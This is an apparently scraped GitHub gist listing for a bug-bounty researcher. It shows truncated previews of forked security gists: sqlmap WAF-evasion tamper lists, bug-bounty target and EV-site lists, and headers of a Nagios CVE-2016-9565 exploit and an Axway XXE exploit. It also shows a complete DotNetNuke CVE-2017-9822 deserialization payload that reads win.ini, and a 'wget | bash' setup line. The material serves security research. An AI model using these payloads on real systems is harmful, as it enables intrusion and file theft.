This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
pikpikcu
/ sqlmap tamper scripts
Created
September 13, 2022 12:49
— forked from sapran/sqlmap tamper scripts
sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |
pikpikcu
/ target BB
Created
March 3, 2022 22:31
— forked from marz-hunter/target BB
Large target BugBounty
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "program_name": "(ISC)²", | |
| "policy_url": "https://bugcrowd.com/isc2", | |
| "submission_url": "https://bugcrowd.com/isc2/report", | |
| "launch_date": "", | |
| "bug_bounty": false, | |
| "swag": false, | |
| "hall_of_fame": true, | |
| "safe_harbor": "partial" |
pikpikcu
/ JavascriptRecon.md
Created
December 21, 2021 05:51
My Javascript Recon Process - BugBounty
pikpikcu
/ ev-sites.txt
Created
March 24, 2021 06:38
— forked from ScottHelme/ev-sites.txt
Sites using EV in the Top 1 Million - 13th Sep 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 14 apple.com | |
| 40 vk.com | |
| 44 github.com | |
| 49 tumblr.com | |
| 55 dropbox.com | |
| 85 medium.com | |
| 87 paypal.com | |
| 92 icloud.com | |
| 100 booking.com | |
| 112 weebly.com |
pikpikcu
/ nagios_cmd_injection.py
Created
February 15, 2021 09:22
— forked from xl7dev/nagios_cmd_injection.py
Nagios Exploit Command Injection CVE-2016-9565
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| intro = """\033[94m | |
| Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565) | |
| nagios_cmd_injection.py ver. 1.0 | |
| Discovered & Coded by: | |
| Dawid Golunski | |
| https://legalhackers.com | |
| \033[0m |
pikpikcu
/ pacs_vuln_report.md
Created
February 8, 2021 01:07
— forked from leommxj/pacs_vuln_report.md
- vendor page: https://pacsone.net/
- patched version: 7.1.1
- Credits: Xinjie Ma from Chaitin Research Lab
- 2020.07.19 send report to a vendor's partner
- 2020.07.20 they inform the real vendor
pikpikcu
/ ReadFile.xml
Created
September 5, 2020 17:39
— forked from pwntester/ReadFile.xml
DotNetNuke (CVE-2017-9822) Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile> |
pikpikcu
/ Axway SecureTransport 5.x Unauthenticated XXE
Created
September 5, 2020 03:06
— forked from zeropwn/Axway SecureTransport 5.x Unauthenticated XXE
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _ | |
| _______ _ __ ___ | | ___ | | | |
| |_ / _ \ '__/ _ \ | |/ _ \| | | |
| / / __/ | | (_) || | (_) | | | |
| /___\___|_| \___(_)_|\___/|_| | |
| https://zero.lol | |
| zero days 4 days | |
| ATTENTION: |
pikpikcu
/ sqli2.yaml
Created
September 2, 2020 08:26
— forked from 0x240x23elu/sqli2.yaml
Basic SQL Injection Detections nuclei Template
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: SQLInjection_ERROR | |
| info: | |
| name: SQLINJECTION Detection | |
| author: 0x240x23elu & OFJAAAH | |
| severity: High | |
| requests: | |
| - method: GET |
pikpikcu
/ setup_bbty.sh
Created
August 19, 2020 19:21
— forked from LuD1161/setup_bbty.sh
Setup Bug Bounty Tools on AWS instance / any VPS for that matter
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Execute as wget -O - https://gist.github.com/LuD1161/66f30da6d8b6c1c05b9f6708525ea885/raw | bash | |
| # # Thanks JeffreyShran for the gist url thing | |
| # | |
| # | |
| # It's debian based, so for centos and likewise you have to change apt to yum and similarly | |
| # | |
| InstallationStartTime=$(date +%s) |
NewerOlder